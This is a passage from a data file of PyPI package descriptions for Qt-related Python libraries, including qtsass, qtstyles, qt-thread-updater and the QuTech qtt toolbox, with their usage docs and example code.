a 100% valid SASS file, so this support of!might change in the future.\nThis can be replaced by the direct use of the_qnot_keyword in your SASS file:QLineEdit:_qnot_editable{/* will generate QLineEdit:!editable { */...}qlineargradientThe qlineargradient function also has a non-valid CSS syntax.qlineargradient(x1:0,y1:0,x2:0,y2:1,stop:0.1blue,stop:0.8green)To support qlineargradient QtSASS provides a preprocessor and a SASS implementation of the qlineargradient function. The above QSS syntax will be replaced with the following:qlineargradient(0,0,0,1,(0.1blue,0.8green))You may also use this syntax directly in your QtSASS.qlineargradient(0, 0, 0, 1, (0.1 blue, 0.8 green))\n# the stops parameter is a list, so you can also use variables:\n$stops = 0.1 blue, 0.8 green\nqlineargradient(0, 0, 0, 0, $stops)qrgbaQt's rgba:rgba(255,128,128,50%)is replaced by CSS rgba:rgba(255,128,128,0.5)Executable usageTo compile your SASS stylesheet to a Qt compliant CSS file:# If -o is omitted, output will be printed to consoleqtsassstyle.scss-ostyle.cssTo use the watch mode and get your stylesheet auto recompiled on each file save:# If -o is omitted, output will be print to consoleqtsassstyle.scss-ostyle.css-wTo compile a directory containing SASS stylesheets to Qt compliant CSS files:qtsass./static/scss-o./static/cssYou can also use watch mode to watch the entire directory for changes.qtsass./static/scss-o./static/css-wSet the Environment Variable QTSASS_DEBUG to 1 or pass the --debug flag to enable logging.qtsass./static/scss-o./static/css--debugAPI methodscompile(string, **kwargs)Conform and Compile QtSASS source code to CSS.This function conforms QtSASS to valid SCSS before passing it to\nsass.compile. Any keyword arguments you provide will be combined with\nqtsass's default keyword arguments and passed to sass.compile.Examples:>>>importqtsass\n>>>qtsass.compile(\"QWidget {background: rgb(0, 0, 0);}\")QWidget{background:black;}Arguments:string: QtSASS source code to conform and compile.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_filename(input_file, output_file=None, **kwargs):Compile and return a QtSASS file as Qt compliant CSS. Optionally save to a file.Examples:>>>importqtsass\n>>>qtsass.compile_filename(\"dummy.scss\",\"dummy.css\")>>>css=qtsass.compile_filename(\"dummy.scss\")Arguments:input_file: Path to QtSass file.output_file: Path to write Qt compliant CSS.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_dirname(input_dir, output_dir, **kwargs):Compiles QtSASS files in a directory including subdirectories.>>>importqtsass\n>>>qtsass.compile_dirname(\"./scss\",\"./css\")Arguments:input_dir: Path to directory containing QtSass files.output_dir: Directory to write compiled Qt compliant CSS files to.kwargs: Keyword arguments to pass to sass.compileenable_logging(level=None, handler=None):Enable logging for qtsass.Sets the qtsass logger's level to:\n1. the provided logging level\n2. logging.DEBUG if the QTSASS_DEBUG envvar is a True value\n3. 
logging.WARNING>>>importlogging\n>>>importqtsass\n>>>handler=logging.StreamHandler()>>>formatter=logging.Formatter('%(level)-8s: %(name)s> %(message)s')>>>handler.setFormatter(formatter)>>>qtsass.enable_logging(level=logging.DEBUG,handler=handler)Arguments:level: Optional logging levelhandler: Optional handler to addwatch(source, destination, compiler=None, Watcher=None):Watches a source file or directory, compiling QtSass files when modified.The compiler function defaults to compile_filename when source is a file\nand compile_dirname when source is a directory.Arguments:source: Path to source QtSass file or directory.destination: Path to output css file or directory.compiler: Compile function (optional)Watcher: Defaults to qtsass.watchers.Watcher (optional)Returns:qtsass.watchers.Watcher instanceContributingEveryone is welcome to contribute!SponsorsSpyder and its subprojects are funded thanks to the generous support ofand the donations we have received from our users around the world throughOpen Collective:Please consider becoming a sponsor!"} +{"package": "qtsass310", "pacakge-description": "QtSASS: Compile SCSS files to Qt stylesheetsCopyright \u00a9 2015 Yann LanthonyCopyright \u00a9 2017\u20132018 Spyder Project ContributorsTHIS DISTRIBUTION IS DEPRECATEDUseqtsass>=0.3.1instead.OverviewSASSbrings countless amazing features to CSS.\nBesides being used in web development, CSS is also the way to stylize Qt-based desktop applications.\nHowever, Qt's CSS has a few variations that prevent the direct use of SASS compiler.The purpose of this tool is to fill the gap between SASS and Qt-CSS by handling those variations.Qt's CSS specificitiesThe goal of QtSASS is to be able to generate a Qt-CSS stylesheet based on a 100% valid SASS file.\nThis is how it deals with Qt's specifics and how you should modify your CSS stylesheet to use QtSASS.\"!\" in selectorsQt allows to define the style of a widget according to its states, like this:QLineEdit:enabled{...}However, a \"not\" state is problematic because it introduces an exclamation mark in the selector's name, which is not valid SASS/CSS:QLineEdit:!editable{...}QtSASS allows \"!\" in selectors' names; the SASS file is preprocessed and any occurence of:!is replaced by:_qnot_(for \"Qt not\").\nHowever, using this feature prevents from having a 100% valid SASS file, so this support of!might change in the future.\nThis can be replaced by the direct use of the_qnot_keyword in your SASS file:QLineEdit:_qnot_editable{/* will generate QLineEdit:!editable { */...}qlineargradientThe qlineargradient function also has a non-valid CSS syntax.qlineargradient(x1:0,y1:0,x2:0,y2:1,stop:0.1blue,stop:0.8green)To support qlineargradient QtSASS provides a preprocessor and a SASS implementation of the qlineargradient function. 
The above QSS syntax will be replaced with the following:qlineargradient(0,0,0,1,(0.1blue,0.8green))You may also use this syntax directly in your QtSASS.qlineargradient(0, 0, 0, 1, (0.1 blue, 0.8 green))\n# the stops parameter is a list, so you can also use variables:\n$stops = 0.1 blue, 0.8 green\nqlineargradient(0, 0, 0, 0, $stops)qrgbaQt's rgba:rgba(255,128,128,50%)is replaced by CSS rgba:rgba(255,128,128,0.5)Executable usageTo compile your SASS stylesheet to a Qt compliant CSS file:# If -o is omitted, output will be printed to consoleqtsassstyle.scss-ostyle.cssTo use the watch mode and get your stylesheet auto recompiled on each file save:# If -o is omitted, output will be print to consoleqtsassstyle.scss-ostyle.css-wTo compile a directory containing SASS stylesheets to Qt compliant CSS files:qtsass./static/scss-o./static/cssYou can also use watch mode to watch the entire directory for changes.qtsass./static/scss-o./static/css-wSet the Environment Variable QTSASS_DEBUG to 1 or pass the --debug flag to enable logging.qtsass./static/scss-o./static/css--debugAPI methodscompile(string, **kwargs)Conform and Compile QtSASS source code to CSS.This function conforms QtSASS to valid SCSS before passing it to\nsass.compile. Any keyword arguments you provide will be combined with\nqtsass's default keyword arguments and passed to sass.compile.Examples:>>>importqtsass\n>>>qtsass.compile(\"QWidget {background: rgb(0, 0, 0);}\")QWidget{background:black;}Arguments:string: QtSASS source code to conform and compile.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_filename(input_file, dest_file, **kwargs):Compile and save QtSASS file as Qt compliant CSS.Examples:>>>importqtsass\n>>>qtsass.compile_filename('dummy.scss','dummy.css')Arguments:input_file: Path to QtSass file.dest_file: Path to destination Qt compliant CSS file.kwargs: Keyword arguments to pass to sass.compilecompile_filename(input_file, output_file, **kwargs):Compile and save QtSASS file as Qt compliant CSS.Examples:>>>importqtsass\n>>>qtsass.compile_filename('dummy.scss','dummy.css')Arguments:input_file: Path to QtSass file.output_file: Path to write Qt compliant CSS.kwargs: Keyword arguments to pass to sass.compilecompile_dirname(input_dir, output_dir, **kwargs):Compiles QtSASS files in a directory including subdirectories.>>>importqtsass\n>>>qtsass.compile_dirname(\"./scss\",\"./css\")Arguments:input_dir: Path to directory containing QtSass files.output_dir: Directory to write compiled Qt compliant CSS files to.kwargs: Keyword arguments to pass to sass.compileenable_logging(level=None, handler=None):Enable logging for qtsass.Sets the qtsass logger's level to:\n1. the provided logging level\n2. logging.DEBUG if the QTSASS_DEBUG envvar is a True value\n3. 
logging.WARNING>>>importlogging\n>>>importqtsass\n>>>handler=logging.StreamHandler()>>>formatter=logging.Formatter('%(level)-8s: %(name)s> %(message)s')>>>handler.setFormatter(formatter)>>>qtsass.enable_logging(level=logging.DEBUG,handler=handler)Arguments:level: Optional logging levelhandler: Optional handler to addwatch(source, destination, compiler=None, Watcher=None):Watches a source file or directory, compiling QtSass files when modified.The compiler function defaults to compile_filename when source is a file\nand compile_dirname when source is a directory.Arguments:source: Path to source QtSass file or directory.destination: Path to output css file or directory.compiler: Compile function (optional)Watcher: Defaults to qtsass.watchers.Watcher (optional)Returns:qtsass.watchers.Watcher instanceContributingEveryone is welcome to contribute!SponsorsSpyder and its subprojects are funded thanks to the generous support ofand the donations we have received from our users around the world throughOpen Collective:Please consider becoming a sponsor!"} +{"package": "qtsasstheme", "pacakge-description": "qtsassthemeSet the Qt theme (e.g. darkgray/lightgray/darkblue/lightblue) easilyThis is using SCSS to set the light/dark theme to PyQt GUI, which is quite efficient.Old name of this isqt-sass-theme-getter.Setupgit clone ~(recommended)python -m pip install qtsasstheme- install as pypi package (good for test only)Using withpyinstallermake main.py inside the qtsasstheme directorypython -m PyInstaller main.py --add-data \"qt_sass_theme;./qt_sass_theme\"(if your main script is main.py)go to the dist/test folder and start the *.exe fileIncluded Packagesqtpy- support pyqt5/pyside2/pyqt6/pyside6qtsass- for converting sass into cssDetailed DescriptionMethod OverviewgetThemeFiles(theme: str = 'dark_gray', font=QFont('Arial', 9), background_darker=False, output_path=os.getcwd())Currently there are 4 official theme being supported:dark_graydark_bluelight_graylight_blueYou can also make your own theme withcustomizing theme.background_darkerdecides whether the background color is going to be darker than general widget color or not.If that is set toTrue, background color is darker than general widget color. See image below.If that is set toFalse(which is set by default), background color is lighter than general widget color. See image below.output_pathis the path that 'res' directory will be made which is holding a bunch of theme files after you calledgetThemeFiles.'res' directory looks like below.icodirectory holds icon files which will be being used in theme. For example, light icons will be being used in dark theme, dark icons will be being used in light theme._icons.scssmakes sass files insassdirectory refer to icons in this directory.sassdirectory holds the scss files which will be converted into css files.vardirectory holds the_variables.scsswhich contains the color(e.g. color of background/widget/border...) variables.setThemeFiles(main_window: QWidget, input_path='res')Right after callinggetThemeFiles, you can set the style with callingsetThemeFiles.After calling it, 'res' directory looks like this:scss files successfully convert into css files.Note: Don't change the current directory with function such asos.chdirafter callinggetThemeFilesand before callingsetThemeFiles.FileNotFoundErrorwill be most likely occurred.Customizing ThemeThere are two ways to customize theme.1. Giving color string togetThemeFilesYou can give the 6-digit hex string(e.g. 
#FF0000) togetThemeFiles'sthemeargument.In this case, widget's color will be set based on the hex color you given.This is the way how to do it://..app=QApplication(sys.argv)w=SampleWidget()g=QtSassTheme()g.getThemeFiles(theme='#6f495f')g.setThemeFiles(w)w.show()app.exec()2. Modify_variables.scss's color directlyThis is the way how to do it:CallinggetThemeFilesg=QtSassTheme()g.getThemeFiles()'res' directory like above will be generated. You can see_variables.scss.Change the variablesopen the_variables.scssand change the$bgcolor's value.This is_variables.scss's contents(dark-gray theme).$bgcolor:#555555;$widgetcolor:darken($bgcolor,10);$altwidgetcolor:lighten($widgetcolor,18);$textcolor:#DDDDDD;$hovercolor:lighten($widgetcolor,6);$bordercolor:lighten($widgetcolor,20);$selectcolor:darken($widgetcolor,6);$disabledcolor:#AAAAAA;$textwidgetcolor:darken($widgetcolor,12);$scrollhandlecolor:lighten($widgetcolor,30);$splitterhandlecolor:darken($widgetcolor,10);You can change any colors.In this example i will change the $bgcolor from #555555 to #006600(dark-green).CallingsetThemeFiles//..app=QApplication(sys.argv)w=SampleWidget()g=QtSassTheme()g.setThemeFiles(w)w.show()app.exec()ExampleCode SamplefromPyQt5.QtWidgetsimportQApplication# from PyQt6.QtWidgets import QApplication# from PySide2.QtWidgets import QApplication# from PySide6.QtWidgets import QApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqt_sass_themeimportQtSassThemeif__name__==\"__main__\":importsysapp=QApplication(sys.argv)widget=SettingsDialog()g=QtSassTheme()g.getThemeFiles(theme='dark_gray')# g.getThemeFiles(theme='dark_blue') - if you want to set dark blue themeg.setThemeFiles(main_window=widget)widget.show()app.exec()ResultPreview widget ispyqt-timer's settings dialog.Dark gray themeDark blue themeLight gray themeLight blue theme"} +{"package": "qt-sass-theme-getter", "pacakge-description": "qt-sass-theme-getterSet the Qt theme (e.g. dark/light/darkblue/lightblue) easilyThis is using SCSS to set the light/dark theme to PyQt GUI, which is quite efficient.Setuppython -m pip install qt-sass-theme-getterIncluded Packagesqtsass- for converting sass into csspyqt-svg-button- for supporting svg buttonMethod OverviewgetThemeFiles(theme: str = 'dark', output_path=os.getcwd())Supporting theme:darkdark_bluelightlight_blueTheme files will be saved in 'res' directory ofoutput_pathafter you calledgetThemeFiles.'res' directory looks like this:icodirectory holds icon files which will be being used in theme. For example, light icons will be being used in dark theme, dark icons will be being used in light theme._icons.scssmakes sass files insassdirectory refer to icons in this directory.sassdirectory holds the scss files which will be converted into css files.vardirectory holds the_variables.scsswhich contains the color(e.g. color of background/widget/border...) variables. 
You can change the_variables.scss's variables whatever you want, if you want to set custom variables.setThemeFiles(main_window: QWidget, input_path='res', exclude_type_lst: list = [])Right after callinggetThemeFiles, you can set the style with callingsetThemeFiles.After calling it, 'res' directory looks like this:scss files successfully convert into css files.Note: Don't change the current directory with function such asos.chdirafter callinggetThemeFilesand before callingsetThemeFiles.FileNotFoundErrorwill be most likely occurred.ExampleCode SamplefromPyQt5.QtWidgetsimportQApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqt_sass_theme_getterimportQtSassThemeGetterif__name__==\"__main__\":importsysapp=QApplication(sys.argv)widget=SettingsDialog()g=QtSassThemeGetter()g.getThemeFiles(theme='dark')# g.getThemeFiles(theme='dark_blue') - if you want to set dark blue themeg.setThemeFiles(main_window=widget)widget.show()app.exec_()ResultDark themeDark blue themeLight themeLight blue theme"} +{"package": "qtscompile", "pacakge-description": "your project readme"} +{"package": "qtsit", "pacakge-description": "No description available on PyPI."} +{"package": "qtsix", "pacakge-description": "QtSix provides a compatibility layer that allows to write Pythonapplications that work with different Qt bindings: PyQt5, PyQt4 orPySide.An application that used QtSix can work correctly if any of thesupported Qt bindings is installed on the system.QtSix automatically detects available bindings and uses themtransparently.If more than one Qt_ binding is present on the system then it is selectedthe first one available in the following order: PyQt5, PyQt4, PySide."} +{"package": "qtsnbl", "pacakge-description": "No description available on PyPI."} +{"package": "qtstrap", "pacakge-description": "QtStrap: Qt application bootstrapping frameworkQt is excellent, but it's also enormous. There's a lot of topics, and many of them have hidden gotchas. PySide2 and PyQt are also excellent, letting us leverage the powerful Qt libraries from up in the clouds in PythonLand, but this arrangement has its own gotchas.The goal of qtstrap is get your applications up and running quickly, so you can focus on your problem instead of on Qt's idiosyncracies.FeaturesMore complete docs are availablehere.qtstrapcommand line tool to bootstrap new projectscrossplatform makefile with useful development commandspreconfigured build system using PyInstaller and InnoSetupcustom Qt widgets with useful behaviorsPythonic layout system using ContextLayoutsSome other stuff I haven't remembered yetCustom WidgetsLabelEditHLineandVLineLinkLabelButtons:StateButtonIconToggleButtonConfirmToggleButtonMenuButtonPersistent Widgets (for rapid prototyping of saved data):PersistentCheckableActionPersistentCheckBoxPersistentComboBoxPersistentLineEditPersistentListWidgetPersistentPlainTextEditPersistentTabWidgetPersistentTextEditPersistentTreeWidgetUtility Classes and FunctionsAdapterTimeStampStringBuildercall_later()decorators:@accepts_file_drops@trace@singletoncontext managers:DeferSignalBlockerqtstrap.extras:CommandPalette, like VSCode or SublimeTextLogging Subsystem: log to local database + log viewer widgetsCodeEditor: Custom QTextEditor subclass customized for code editingDependenciesPython 3PySide2 or PyQt5Make(optional, but recommended)InstallationpipinstallqtstrapContributingContributions are always welcome. 
Feel free toopen an issueorstart a new discussionon our GitHub."} +{"package": "qtstyles", "pacakge-description": "[![Build Status](https://travis-ci.org/simongarisch/qtstyles.svg?branch=master)](https://travis-ci.org/simongarisch/qtstyles)[![Coverage Status](https://coveralls.io/repos/github/simongarisch/qtstyles/badge.svg?branch=master&service=github)](https://coveralls.io/github/simongarisch/qtstyles?branch=master)[![PyPI version](https://badge.fury.io/py/qtstyles.svg)](https://badge.fury.io/py/qtstyles)# qtstylesA collection of Qt Style Sheets accompanied by useful classes.## Installationqtstyles is python 2 and 3 compatible.```bashpip install qtstyles```## OverviewProvided are **Two ways** to change your Qt application style sheet:## 1. With the StylePicker classView available styles with:```pythonfrom qtstyles import StylePickerStylePicker().available_styles```And change the Qt application style using the get_sheet() method:```pythonfrom qtpy import QtWidgetsfrom qtstyles import StylePickerapp = QtWidgets.QApplication([])win = QtWidgets.QMainWindow()app.setStyleSheet(StylePicker(\"qdark\").get_sheet()) # <-- changing the style herewin.show()app.exec_()```## 2. We can also change the style sheet with an instance of StylePickerWidget (inherits from QComboBox)```pythonfrom qtpy import QtWidgetsfrom qtstyles import StylePickerWidgetapp = QtWidgets.QApplication([])win = QtWidgets.QMainWindow()picker_widget = StylePickerWidget() # <-- this QComboBox allows the user to change style sheetswin.setCentralWidget(picker_widget)win.show()app.exec_()```See the 'Overview Notebook.ipynb' for additional details.## MotivationWhen looking for Qt ('.qss') style sheets most were scattered across different sites.Disclaimer: I've collected these style sheets from different repositories and they are not my own work.Attribution, links and the associated licenses have been provided at the top of each qss file.If you'd like to add a style sheet please create a pull request and I'll be happy to take a look.## What does it look likeThe StylePickerWidget is in the bottom left hand side of this window:![qstyles demo](https://github.com/simongarisch/qtstyles/blob/master/demo.PNG?raw=true)"} +{"package": "qt-style-sheet-inspector", "pacakge-description": "Qt Style Sheet InspectorA inspector widget to view and modify style sheet of a Qt app in runtime.Free software: MIT licenseObservationIt need PyQt5 to work but it doesn\u2019t have it as a dependency, as testing with PyQt5 pypi proved\nunreliable (may be changed in the future).FeaturesCan view current style sheet of application during runtimeStyle sheet can be changed in runtime, facilitating the process of designing a custom GUIHas a search bar to help find specific types or namesCan undo/redo changesHistory0.1.0 (2016-09-28)First release."} +{"package": "qtstylish", "pacakge-description": "AboutThis package provides a modern light and dark theme for PyQt5. 
I made this because I was not satisfied with alternatives:qtmodernoverrides QPalette but I needed a purely stylesheet-based solutionQDarkStyleSheetandBreezeStyleSheetshad some visual bugs and a different aesthetic than what I wantedScreenshotsInstallationpip install qtstylishUsageimport qtstylish\nmy_widget.setStyleSheet(qtstylish.light())More InfoWorks best with app style set to FusionIcons are mostly modified fromhttps://github.com/microsoft/fluentui-system-iconsUses qtsass for compiling to QSShttps://github.com/spyder-ide/qtsassTook some SCSS & ideas fromhttps://github.com/ColinDuquesnoy/QDarkStyleSheetandhttps://github.com/Alexhuszagh/BreezeStyleSheetsAlternativesQDarkStyleSheetBreezeStyleSheets"} +{"package": "qtt", "pacakge-description": "WelcomeWelcome to the QTT framework. This README will shortly introduce the framework, and it will guide you through the structure, installation process and how to contribute. We look forward to working with you!Quantum Technology ToolboxQuantum Technology Toolbox (QTT) is a Python-based framework developed initially by QuTech for the tuning and calibration of\nquantum dots and spin qubits.QuTechis an advanced research center based in Delft, the Netherlands, for quantum\ncomputing and quantum internet, a collaboration founded by theUniversity of Technology Delft(TU Delft) and\nthe Netherlands Organisation for Applied Scientific Research (TNO).For usage of QTT see the detaileddocumentationon readthedocs.io.QTT is the framework on which you can base your measurement and analysis scripts. QTT is based\nonQCoDeS(basic framework such as instrument drivers, DataSet) and theSciPyecosystem.InstallationQTT is compatible with Python 3.8+. QTT can be installed as a pip package to be used in a (virtual) Python environment.\nWe assume that software packages likegitandpythonare already installed on your system.Note: when running Ubuntu Linux, installing these packages is done via:sudoaptinstallgitgccpython3.11python3.11-venvpython3.11-devfor Python 3.11.x. Other Linux distributions require similar steps.Setting up a virtual environmentTo create a clean virtual Python environment for your QTT development do:mkdirqttcdqttNow activate the virtual environment. On Linux do:python3-mvenvenv\n../env/bin/activateorsource./env/bin/activateOn Windows do:python-mpipinstallvirtualenv\npython-mvirtualenv--copiesenv\nenv\\Scripts\\activate.batNow we are ready to install QTT.Installation from PyPITo use QTT, install it as a pip package:pipinstallqttor install QTT from source.Installing from sourceThe source for QTT can be found at Github.\nFor the default installation from the QTT source directory execute:gitclonehttps://github.com/QuTech-Delft/qtt.gitcdqtt\npipinstallwheelFor QTT development install QTT in editable mode:pipinstall-e.For non-editable mode do:pipinstall.When (encountered on Linux) PyQt5 gives an error when installing try upgrading pippipinstall--upgradepipand rerun the respective install command.When incompatibility problems ariseNote: This step is not meant for python >=3.11Sometimes the default installation does not work because of incompatible dependencies between the used packages\non your system. To be sure you use all the right versions of the packages used by QTT and its dependencies do:pipinstall.-rrequirements_lock_py310.txtor for developmentpipinstall-e.-rrequirements_lock_py310.txtThis will install a tested set of all the packages QTT depends on.TestingTests for the QTT packages are contained in the subdirectorytests. 
To run the tests run the following command:pytestWhen integration tests fail because of errors in plotting try downgrading opencv-python to 4.2.0.34:pipinstallopencv-python==4.2.0.34When running on Windows Sysbsystem for Linux (WSL) you may need to uninstall opencv and install the headless version:pipuninstallopencv-python\npipinstallopencv-python-headlessInstalling for generating documentationTo install the necessary packages to perform documentation activities for QTT do:pipinstall-e.[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cddocs\nmakehtmlVandersypen research groupFor the Vandersypen research group there are more detailed instructions, read the file INSTALL.md in the spin-projects\nrepository.Updating QTTTo update QTT do:pipinstall.--upgradeUsageSee thedocumentationand the example notebooks in thedocs/notebooksdirectory.For a general introduction also seeIntroduction to GithubScientific python lecturesIf you useSpyderthen use the following settings:Use aIPythonconsole and inTools->Preferences->IPython console->Graphicsset the IPython backend graphics option toQt5. This ensures correctly displaying theParameterViewerandDataBrowserInTools->Preferences->Console->Advanced settingsuncheck the boxEnable UMRContributingSeeContributingfor information about bug/issue reports, contributing code, style, and testingLicenseSeeLicense"} +{"package": "qtterm", "pacakge-description": "No description available on PyPI."} +{"package": "qt-thread-updater", "pacakge-description": "Python Qt thread updater to update GUI items using a separate thread.This library allows you to efficiently update Qt GUI elements from a separate thread. Qt GUI elements are not thread\nsafe. Method calls likeLabel.setTextdo not work in a separate thread. This library solves that problem.UtilitiesThe ThreadUpdater offers several utilities to help with updating a widget\u2019s value.call_latest - Call the given function with the most recent value in the main thread using the timer.It is safe to call this many times with the same function.If the given function is called multiple times it is only called once with the most recent value.call_in_main - Call the given function in the main thread using the timer.Every time you call this function the given function will be called in the main threadIf the given function is called multiple times it will be called every time in the main thread.If this function is called too many times it could slow down the main event loop.register_continuous - Register a function to be called every time theThreadUpdater.updatemethod is called.Thetimeoutvariable (in seconds) indicates how often the registered functions will be called.delay - Call a function after the given number of seconds has passed.This will not be accurate. 
Accuracy can be improved by lowering the timeout to increase how often the timer runs.ThreadUpdater ExamplesBelow are some examples of how the ThreadUpdater would normally be used.Simple Thread ExampleThe example below tells the update to run lbl.setText in the main thread with the latest value.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])lbl=QtWidgets.QLabel(\"Latest Count: 0\")lbl.resize(300,300)lbl.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Latest Count:{}'.format(data['counter'])get_updater().call_latest(lbl.setText,text)data['counter']+=1time.sleep(0.001)# Not needed (still good to have some delay to release the thread)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()Continuous Update ExampleThe example below continuously runs the update function every timeThreadUpdater.update()is called from the timer.\nThis may be inefficient if there is no new data to update the label with.importtimeimportthreadingfromqtpyimportQtWidgetsimportqt_thread_updater# from qt_thread_updater import get_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])lbl=QtWidgets.QLabel(\"Continuous Count: 0\")lbl.resize(300,300)lbl.show()data={'counter':0}qt_thread_updater.set_updater(qt_thread_updater.ThreadUpdater(1/60))@qt_thread_updater.register_continuousdefupdate():\"\"\"Update the label with the current value.\"\"\"lbl.setText('Continuous Count:{}'.format(data['counter']))# get_updater().register_continuous(update)defrun(is_alive):is_alive.set()whileis_alive.is_set():data['counter']+=1# time.sleep(0.001) # Not needed (still good to have some delay to release the thread)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()qt_thread_updater.delay(5,app.quit)# Quit after 5 secondsapp.exec_()alive.clear()cleanup_app()Call In Main ExampleThe example below calls the append function every time. It may not be efficient.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QtWidgets.QTextEdit()text_edit.resize(300,300)text_edit.setReadOnly(True)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}'.format(data['counter'])get_updater().call_in_main(text_edit.append,text)data['counter']+=1time.sleep(0.01)# Some delay/waiting is requiredalive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()Delay ExampleThe example below calls the append function after X number of seconds has passed. The delay function will not be\naccurate, but guarantees that the function is called after X number of seconds. 
To increase accuracy give theThreadUpdatera smaller timeout for it to run at a faster rate.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QtWidgets.QTextEdit()text_edit.resize(300,300)text_edit.setReadOnly(True)text_edit.show()now=time.time()defupdate_text(set_time):text_edit.append('Requested{:.04f}Updated{:.04f}'.format(set_time,time.time()-now))# Lower the timeout so it runs at a faster rate.get_updater().timeout=0# 0.0001 # Qt runs in millisecondsget_updater().delay(0.5,update_text,0.5)get_updater().delay(1,update_text,1)get_updater().delay(1.5,update_text,1.5)get_updater().delay(2,update_text,2)get_updater().delay(2.5,update_text,2.5)get_updater().delay(3,update_text,3)app.exec_()WidgetsI\u2019ve decdied to include a couple of useful Qt Widgets with this library.QuickPlainTextEdit - Used to display fast streams of dataQuickTextEdit - Display fast streams of data with color.QuickPlainTextEditQuickly display data from a separate thread.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickPlainTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickPlainTextEdit()text_edit.resize(300,300)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}\\n'.format(data['counter'])text_edit.write(text)data['counter']+=1time.sleep(0.0001)# Some delay is usually required to let the Qt event loop run (not needed if IO used)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()QuickTextEditQuickly display data from a separate thread using color.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickTextEdit()text_edit.resize(300,300)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}\\n'.format(data['counter'])text_edit.write(text,'blue')data['counter']+=1time.sleep(0.0001)# Some delay is usually required to let the Qt event loop run (not needed if IO used)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()QuickTextEdit RedirectDisplay print (stdout and stderr) in a QTextEdit with color.importsysimporttimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickTextEdit()text_edit.resize(300,300)text_edit.show()sys.stdout=text_edit.redirect(sys.__stdout__,color='blue')sys.stderr=text_edit.redirect(sys.__stderr__,color='red')data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():stdout_text='Main Count:{}'.format(data['counter'])# Print gives \\n automaticallyerror_text='Error Count:{}'.format(data['counter'])# Print gives \\n automatically# Print automatically give '\\n' with the \"end\" keyword argument.print(stdout_text)# Print will write to sys.stdout where the rediect will write to text_edit and stdoutprint(error_text,file=sys.stderr)# Print to sys.stderr. Rediect will write to text_edit and stderrdata['counter']+=1# Some delay is usually desired. 
print/sys.__stdout__ uses IO which gives time for Qt's event loop.# time.sleep(0.0001)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()"} +{"package": "qttk", "pacakge-description": "qttk[qttk] Quantitative Trading ToolKit - Quant trading library developed by Conlan Scientific Open-Source Research CohortDesign PhilosophyConsistentDate-indexedpandasobjects are the core data structure.TransparentTest cases are clear and serve as an additional layer of documentation. Type hints are used liberally.PerformantExecution speed tests are built into test cases. Only the fastest functions get published.Getting Started withqttkInstall from PyPI usingpip install qttk. Try the following sample.# Indicators module contains core qttk functionalityfromqttk.indicatorsimportcompute_rsi# qttk is 'batteries included' with simulated datafromqttk.utils.sample_dataimportload_sample_data# Load a ticker from csv into dataframedf=load_sample_data('AWU')print(df.head())rsi=compute_rsi(df)print(rsi[-10:])Next StepsCheck outsome demos on GitHub.Feel free to create a bug or feature request ticket:qttk issue tracker."} +{"package": "qttools", "pacakge-description": "Some convenience classes for PyQt5."} +{"package": "qttp", "pacakge-description": "No description available on PyPI."} +{"package": "qttpte", "pacakge-description": "WelcomeWelcome to the QTT framework. This README will shortly introduce the framework, and it will guide you through the structure, installation process and how to contribute. We look forward to working with you!Quantum Technology ToolboxQuantum Technology Toolbox (QTT) is a Python-based framework developed initially by QuTech for the tuning and calibration of\nquantum dots and spin qubits.QuTechis an advanced research center based in Delft, the Netherlands, for quantum\ncomputing and quantum internet, a collaboration founded by theUniversity of Technology Delft(TU Delft) and\nthe Netherlands Organisation for Applied Scientific Research (TNO).For usage of QTT see the detaileddocumentationon readthedocs.io.QTT is the framework on which you can base your measurement and analysis scripts. QTT is based\nonQCoDeS(basic framework such as instrument drivers, DataSet) and theSciPyecosystem.InstallationQTT is compatible with Python 3.7+. QTT can be installed as a pip package to be used in a (virtual) Python environment.\nWe assume that software packages likegitandpythonare already installed on your system.Note: when running Ubuntu Linux, installing these packages is done via:sudo apt install git gcc python3.7 python3.7-venv python3.7-devfor Python 3.7.x. Other Linux distributions require similar steps.Setting up a virtual environmentTo create a clean virtual Python environment for your QTT development do:mkdir qtt\ncd qttNow activate the virtual environment. On Linux do:python3 -m venv env\n. 
